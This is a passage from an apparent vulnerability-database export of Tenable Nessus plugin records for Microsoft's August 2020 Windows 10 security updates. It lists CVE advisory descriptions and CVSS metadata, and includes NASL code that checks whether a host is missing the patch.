this vulnerability\n could run arbitrary code in kernel mode. 
An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1479)\n\n - An elevation of privilege vulnerability exists when the\n Windows Ancillary Function Driver for WinSock improperly\n handles memory. (CVE-2020-1587)\n\n - An elevation of privilege vulnerability exists when the\n Windows Function Discovery SSDP Provider improperly\n handles memory. (CVE-2020-1579)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-1561, CVE-2020-1562)\n\n - An information disclosure vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The update\n addresses the vulnerability by correcting the way the\n Windows State Repository Service handles objects in\n memory. (CVE-2020-1512)\n\n - An elevation of privilege vulnerability exists when\n Windows Remote Access improperly handles memory.\n (CVE-2020-1530)\n\n - A remote code execution vulnerability exists in the way\n that the MSHTML engine improperly validates input. An\n attacker could execute arbitrary code in the context of\n the current user. (CVE-2020-1567)\n\n - A spoofing vulnerability exists when Windows incorrectly\n validates file signatures. An attacker who successfully\n exploited this vulnerability could bypass security\n features and load improperly signed files. In an attack\n scenario, an attacker could bypass security features\n intended to prevent improperly signed files from being\n loaded. 
The update addresses the vulnerability by\n correcting how Windows validates file signatures.\n (CVE-2020-1464)\");\n # https://support.microsoft.com/en-us/help/4565349/windows-10-update-kb4565349\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5b03d5e5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4565349.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1564\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Spooler Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/08/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : 
Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-08\";\nkbs = make_list('4565349');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"17763\",\n rollup_date:\"08_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4565349])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n\n\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:06:02", "description": "The remote Windows host is missing security update 4571741.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with 
full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1379, CVE-2020-1477, CVE-2020-1478, CVE-2020-1492, CVE-2020-1525, CVE-2020-1554)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1533, CVE-2020-1556)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The security update addresses the vulnerability by correcting how the Connected User Experiences and Telemetry Service handles file operations. (CVE-2020-1511)\n\n - A remote code execution vulnerability exists when Windows Media Audio Codec improperly handles objects. An attacker who successfully exploited the vulnerability could take control of an affected system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Audio Codec handles objects. (CVE-2020-1339)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. 
An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. (CVE-2020-1552)\n\n - An elevation of privilege vulnerability exists when the Windows CDP User Components improperly handle memory.\n (CVE-2020-1549, CVE-2020-1550)\n\n - An information disclosure vulnerability exists when DirectWrite improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how DirectWrite handles objects in memory.\n (CVE-2020-1577)\n\n - An elevation of privilege vulnerability exists when the Windows Radio Manager API improperly handles memory.\n (CVE-2020-1528)\n\n - An information disclosure vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system (CVE-2020-1383)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge (HTML-based). The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. 
(CVE-2020-1555)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folders Service improperly handles memory.\n (CVE-2020-1470, CVE-2020-1484, CVE-2020-1516)\n\n - An elevation of privilege vulnerability exists when the Windows Custom Protocol Engine improperly handles memory. (CVE-2020-1527)\n\n - An elevation of privilege vulnerability exists when the Storage Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges on the victim system.\n (CVE-2020-1490)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1480, CVE-2020-1529)\n\n - An elevation of privilege vulnerability exists when the Windows Speech Runtime improperly handles memory.\n (CVE-2020-1521, CVE-2020-1522)\n\n - An elevation of privilege vulnerability exists when the Windows CSC Service improperly handles memory.\n (CVE-2020-1489, CVE-2020-1513)\n\n - An elevation of privilege vulnerability exists when the Windows Accounts Control improperly handles memory.\n (CVE-2020-1531)\n\n - An elevation of privilege vulnerability exists in the Local Security Authority Subsystem Service (LSASS) when an authenticated attacker sends a specially crafted authentication request. A remote attacker who successfully exploited this vulnerability could cause an elevation of privilege on the target system's LSASS service. The security update addresses the vulnerability by changing the way that LSASS handles specially crafted authentication requests. (CVE-2020-1509)\n\n - A remote code execution vulnerability exists when the Windows Font Driver Host improperly handles memory. 
An attacker who successfully exploited the vulnerability would gain execution on a victim system. The security update addresses the vulnerability by correcting how the Windows Font Driver Host handles memory. (CVE-2020-1520)\n\n - An elevation of privilege vulnerability exists when the Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1519, CVE-2020-1538)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-1380, CVE-2020-1570)\n\n - An elevation of privilege vulnerability exists when the Windows Telephony Server improperly handles memory.\n (CVE-2020-1515)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1487)\n\n - An elevation of privilege vulnerability exists when the Windows AppX Deployment Extensions improperly performs privilege management, resulting in access to system files. (CVE-2020-1488)\n\n - An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory.\n (CVE-2020-1553)\n\n - An elevation of privilege vulnerability exists in the way that the dnsrslvr.dll handles objects in memory. 
An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1584)\n\n - An elevation of privilege vulnerability exists when the Windows Network Connection Broker improperly handles memory. (CVE-2020-1526)\n\n - An elevation of privilege vulnerability exists when ASP.NET or .NET web applications running on IIS improperly allow access to cached files. An attacker who successfully exploited this vulnerability could gain access to restricted files. (CVE-2020-1476)\n\n - An elevation of privilege vulnerability exists when the Windows Remote Access improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges.\n (CVE-2020-1537)\n\n - An elevation of privilege vulnerability exists when the "Public Account Pictures" folder improperly handles junctions. (CVE-2020-1565)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. (CVE-2020-1534)\n\n - A remote code execution vulnerability exists when Microsoft Edge PDF Reader improperly handles objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1568)\n\n - An elevation of privilege vulnerability exists when the Windows Kernel API improperly handles registry objects in memory. An attacker who successfully exploited the vulnerability could gain elevated privileges on a targeted system. A locally authenticated attacker could exploit this vulnerability by running a specially crafted application. 
The security update addresses the vulnerability by helping to ensure that the Windows Kernel API properly handles objects in memory.\n (CVE-2020-1377, CVE-2020-1378)\n\n - An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly allows arbitrary writing to the file system. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1337)\n\n - An information disclosure vulnerability exists when the Windows Image Acquisition (WIA) Service improperly discloses contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system.\n (CVE-2020-1474, CVE-2020-1485)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1417, CVE-2020-1486, CVE-2020-1566)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1473, CVE-2020-1557, CVE-2020-1558, CVE-2020-1564)\n\n - A remote code execution vulnerability exists when Microsoft .NET Framework processes input. An attacker who successfully exploited this vulnerability could take control of an affected system. 
(CVE-2020-1046)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1510)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Engine improperly handles memory.\n (CVE-2020-1535, CVE-2020-1536, CVE-2020-1539, CVE-2020-1540, CVE-2020-1541, CVE-2020-1542, CVE-2020-1543, CVE-2020-1544, CVE-2020-1545, CVE-2020-1546, CVE-2020-1547, CVE-2020-1551)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1479)\n\n - An elevation of privilege vulnerability exists when the Windows Ancillary Function Driver for WinSock improperly handles memory. (CVE-2020-1587)\n\n - An elevation of privilege vulnerability exists when the Windows Function Discovery SSDP Provider improperly handles memory. (CVE-2020-1579)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-1561, CVE-2020-1562)\n\n - An information disclosure vulnerability exists when the Windows State Repository Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows State Repository Service handles objects in memory. 
(CVE-2020-1512)\n\n - An elevation of privilege vulnerability exists when Windows Remote Access improperly handles memory.\n (CVE-2020-1530)\n\n - A remote code execution vulnerability exists in the way that the MSHTML engine improperly validates input. An attacker could execute arbitrary code in the context of the current user. (CVE-2020-1567)\n\n - A spoofing vulnerability exists when Windows incorrectly validates file signatures. An attacker who successfully exploited this vulnerability could bypass security features and load improperly signed files. In an attack scenario, an attacker could bypass security features intended to prevent improperly signed files from being loaded. The update addresses the vulnerability by correcting how Windows validates file signatures.\n (CVE-2020-1464)", "cvss3": {}, "published": "2020-08-11T00:00:00", "type": "nessus", "title": "KB4571741: Windows 10 Version 1709 August 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1046", "CVE-2020-1337", "CVE-2020-1339", "CVE-2020-1377", "CVE-2020-1378", "CVE-2020-1379", "CVE-2020-1380", "CVE-2020-1383", "CVE-2020-1417", "CVE-2020-1464", "CVE-2020-1470", "CVE-2020-1473", "CVE-2020-1474", "CVE-2020-1476", "CVE-2020-1477", "CVE-2020-1478", "CVE-2020-1479", "CVE-2020-1480", "CVE-2020-1484", "CVE-2020-1485", "CVE-2020-1486", "CVE-2020-1487", "CVE-2020-1488", "CVE-2020-1489", "CVE-2020-1490", "CVE-2020-1492", "CVE-2020-1509", "CVE-2020-1510", "CVE-2020-1511", "CVE-2020-1512", "CVE-2020-1513", "CVE-2020-1515", "CVE-2020-1516", "CVE-2020-1519", "CVE-2020-1520", "CVE-2020-1521", "CVE-2020-1522", "CVE-2020-1525", "CVE-2020-1526", "CVE-2020-1527", "CVE-2020-1528", "CVE-2020-1529", "CVE-2020-1530", "CVE-2020-1531", "CVE-2020-1533", "CVE-2020-1534", "CVE-2020-1535", "CVE-2020-1536", "CVE-2020-1537", "CVE-2020-1538", "CVE-2020-1539", "CVE-2020-1540", "CVE-2020-1541", "CVE-2020-1542", "CVE-2020-1543", "CVE-2020-1544", "CVE-2020-1545", "CVE-2020-1546", "CVE-2020-1547", 
"CVE-2020-1549", "CVE-2020-1550", "CVE-2020-1551", "CVE-2020-1552", "CVE-2020-1553", "CVE-2020-1554", "CVE-2020-1555", "CVE-2020-1556", "CVE-2020-1557", "CVE-2020-1558", "CVE-2020-1561", "CVE-2020-1562", "CVE-2020-1564", "CVE-2020-1565", "CVE-2020-1566", "CVE-2020-1567", "CVE-2020-1568", "CVE-2020-1570", "CVE-2020-1577", "CVE-2020-1579", "CVE-2020-1584", "CVE-2020-1587"], "modified": "2023-02-06T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_AUG_4571741.NASL", "href": "https://www.tenable.com/plugins/nessus/139494", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(139494);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/06\");\n\n script_cve_id(\n \"CVE-2020-1046\",\n \"CVE-2020-1337\",\n \"CVE-2020-1339\",\n \"CVE-2020-1377\",\n \"CVE-2020-1378\",\n \"CVE-2020-1379\",\n \"CVE-2020-1380\",\n \"CVE-2020-1383\",\n \"CVE-2020-1417\",\n \"CVE-2020-1464\",\n \"CVE-2020-1470\",\n \"CVE-2020-1473\",\n \"CVE-2020-1474\",\n \"CVE-2020-1476\",\n \"CVE-2020-1477\",\n \"CVE-2020-1478\",\n \"CVE-2020-1479\",\n \"CVE-2020-1480\",\n \"CVE-2020-1484\",\n \"CVE-2020-1485\",\n \"CVE-2020-1486\",\n \"CVE-2020-1487\",\n \"CVE-2020-1488\",\n \"CVE-2020-1489\",\n \"CVE-2020-1490\",\n \"CVE-2020-1492\",\n \"CVE-2020-1509\",\n \"CVE-2020-1510\",\n \"CVE-2020-1511\",\n \"CVE-2020-1512\",\n \"CVE-2020-1513\",\n \"CVE-2020-1515\",\n \"CVE-2020-1516\",\n \"CVE-2020-1519\",\n \"CVE-2020-1520\",\n \"CVE-2020-1521\",\n \"CVE-2020-1522\",\n \"CVE-2020-1525\",\n \"CVE-2020-1526\",\n \"CVE-2020-1527\",\n \"CVE-2020-1528\",\n \"CVE-2020-1529\",\n \"CVE-2020-1530\",\n \"CVE-2020-1531\",\n \"CVE-2020-1533\",\n \"CVE-2020-1534\",\n \"CVE-2020-1535\",\n 
\"CVE-2020-1536\",\n \"CVE-2020-1537\",\n \"CVE-2020-1538\",\n \"CVE-2020-1539\",\n \"CVE-2020-1540\",\n \"CVE-2020-1541\",\n \"CVE-2020-1542\",\n \"CVE-2020-1543\",\n \"CVE-2020-1544\",\n \"CVE-2020-1545\",\n \"CVE-2020-1546\",\n \"CVE-2020-1547\",\n \"CVE-2020-1549\",\n \"CVE-2020-1550\",\n \"CVE-2020-1551\",\n \"CVE-2020-1552\",\n \"CVE-2020-1553\",\n \"CVE-2020-1554\",\n \"CVE-2020-1555\",\n \"CVE-2020-1556\",\n \"CVE-2020-1557\",\n \"CVE-2020-1558\",\n \"CVE-2020-1561\",\n \"CVE-2020-1562\",\n \"CVE-2020-1564\",\n \"CVE-2020-1565\",\n \"CVE-2020-1566\",\n \"CVE-2020-1567\",\n \"CVE-2020-1568\",\n \"CVE-2020-1570\",\n \"CVE-2020-1577\",\n \"CVE-2020-1579\",\n \"CVE-2020-1584\",\n \"CVE-2020-1587\"\n );\n script_xref(name:\"MSKB\", value:\"4571741\");\n script_xref(name:\"MSFT\", value:\"MS20-4571741\");\n script_xref(name:\"IAVA\", value:\"2020-A-0361-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0367-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0370-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n\n script_name(english:\"KB4571741: Windows 10 Version 1709 August 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4571741.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. 
There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1379,\n CVE-2020-1477, CVE-2020-1478, CVE-2020-1492,\n CVE-2020-1525, CVE-2020-1554)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1533, CVE-2020-1556)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The security\n update addresses the vulnerability by correcting how the\n Connected User Experiences and Telemetry Service handles\n file operations. (CVE-2020-1511)\n\n - A remote code execution vulnerability exists when\n Windows Media Audio Codec improperly handles objects. An\n attacker who successfully exploited the vulnerability\n could take control of an affected system. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media Audio\n Codec handles objects. (CVE-2020-1339)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. 
An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-1552)\n\n - An elevation of privilege vulnerability exists when the\n Windows CDP User Components improperly handle memory.\n (CVE-2020-1549, CVE-2020-1550)\n\n - An information disclosure vulnerability exists when\n DirectWrite improperly discloses the contents of its\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how DirectWrite handles objects in memory.\n (CVE-2020-1577)\n\n - An elevation of privilege vulnerability exists when the\n Windows Radio Manager API improperly handles memory.\n (CVE-2020-1528)\n\n - An information disclosure vulnerability exists in RPC if\n the server has Routing and Remote Access enabled. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system (CVE-2020-1383)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge (HTML-based). The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. 
(CVE-2020-1555)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folders Service improperly handles memory.\n (CVE-2020-1470, CVE-2020-1484, CVE-2020-1516)\n\n - An elevation of privilege vulnerability exists when the\n Windows Custom Protocol Engine improperly handles\n memory. (CVE-2020-1527)\n\n - An elevation of privilege vulnerability exists when the\n Storage Service improperly handles file operations. An\n attacker who successfully exploited this vulnerability\n could gain elevated privileges on the victim system.\n (CVE-2020-1490)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-1480, CVE-2020-1529)\n\n - An elevation of privilege vulnerability exists when the\n Windows Speech Runtime improperly handles memory.\n (CVE-2020-1521, CVE-2020-1522)\n\n - An elevation of privilege vulnerability exists when the\n Windows CSC Service improperly handles memory.\n (CVE-2020-1489, CVE-2020-1513)\n\n - An elevation of privilege vulnerability exists when the\n Windows Accounts Control improperly handles memory.\n (CVE-2020-1531)\n\n - An elevation of privilege vulnerability exists in the\n Local Security Authority Subsystem Service (LSASS) when\n an authenticated attacker sends a specially crafted\n authentication request. A remote attacker who\n successfully exploited this vulnerability could cause an\n elevation of privilege on the target system's LSASS\n service. The security update addresses the vulnerability\n by changing the way that LSASS handles specially crafted\n authentication requests. 
(CVE-2020-1509)\n\n - A remote code execution vulnerability exists when the\n Windows Font Driver Host improperly handles memory. An\n attacker who successfully exploited the vulnerability\n would gain execution on a victim system. The security\n update addresses the vulnerability by correcting how the\n Windows Font Driver Host handles memory. (CVE-2020-1520)\n\n - An elevation of privilege vulnerability exists when the\n Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1519, CVE-2020-1538)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-1380, CVE-2020-1570)\n\n - An elevation of privilege vulnerability exists when the\n Windows Telephony Server improperly handles memory.\n (CVE-2020-1515)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1487)\n\n - An elevation of privilege vulnerability exists when the\n Windows AppX Deployment Extensions improperly performs\n privilege management, resulting in access to system\n files. (CVE-2020-1488)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. 
The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1553)\n\n - An elevation of privilege vulnerability exists in the\n way that the dnsrslvr.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1584)\n\n - An elevation of privilege vulnerability exists when the\n Windows Network Connection Broker improperly handles\n memory. (CVE-2020-1526)\n\n - An elevation of privilege vulnerability exists when\n ASP.NET or .NET web applications running on IIS\n improperly allow access to cached files. An attacker who\n successfully exploited this vulnerability could gain\n access to restricted files. (CVE-2020-1476)\n\n - An elevation of privilege vulnerability exists when the\n Windows Remote Access improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could gain elevated privileges.\n (CVE-2020-1537)\n\n - An elevation of privilege vulnerability exists when the\n "Public Account Pictures" folder improperly\n handles junctions. (CVE-2020-1565)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1534)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge PDF Reader improperly handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. If the current\n user is logged on with administrative user rights, an\n attacker could take control of an affected system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. 
(CVE-2020-1568)\n\n - An elevation of privilege vulnerability exists when the\n Windows Kernel API improperly handles registry objects\n in memory. An attacker who successfully exploited the\n vulnerability could gain elevated privileges on a\n targeted system. A locally authenticated attacker could\n exploit this vulnerability by running a specially\n crafted application. The security update addresses the\n vulnerability by helping to ensure that the Windows\n Kernel API properly handles objects in memory.\n (CVE-2020-1377, CVE-2020-1378)\n\n - An elevation of privilege vulnerability exists when the\n Windows Print Spooler service improperly allows\n arbitrary writing to the file system. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-1337)\n\n - An information disclosure vulnerability exists when the\n Windows Image Acquisition (WIA) Service improperly\n discloses contents of its memory. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2020-1474, CVE-2020-1485)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1417, CVE-2020-1486, CVE-2020-1566)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. 
